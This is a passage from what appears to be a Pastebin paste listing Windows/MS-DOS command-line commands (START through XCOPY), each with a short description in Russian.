  490. START - Стартует отдельное окно для выполнения указанной программы или команды.
  491. SUBST - Связывает путь с литерой диска.
  492. SYS - Копирует файлы системы MS-DOS и интерпретатор команд на указанный вами диск.
  493. TIME - Отображает или устанавливает системное время.
  494. TITLE - Устанавливает заголовок окна для сеанса.
  495. TREE - Графически отображает структуру директория в драйве или путь.
  496. TYPE - Отображает содержимое текстового файла.
  497. VER - Отображает версию Windows.
  498. VERIFY - Сообщает Windows, проверять ли правильность записи файлов на диск.
  499. VOL - Отображает метку дискового тома и серийный номер.
  500. XCOPY - Копирует файлы и деревья директории.
  501. 1
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top